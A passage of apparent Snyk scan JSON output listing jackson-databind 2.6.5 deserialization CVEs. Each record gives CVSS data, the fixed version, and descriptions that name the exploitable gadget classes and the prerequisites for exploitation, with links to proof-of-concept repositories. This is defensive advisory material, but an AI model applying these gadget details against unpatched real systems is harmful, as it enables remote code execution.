], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.762302Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35491" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:40:53.658144Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:40:13Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:57.453912Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "bu5yer" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2999", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-35728", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:43.478254Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", - "epssDetails": { - "percentile": "0.80006", - "probability": "0.00674", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35728" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-27T14:34:18.527699Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-27T14:05:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-27T17:34:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.852735Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.093517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36187" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T12:47:33.579319Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T12:44:41Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.970819Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.768509Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36184", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.169091Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36184" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:02:15.197495Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.700251Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.214306Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the 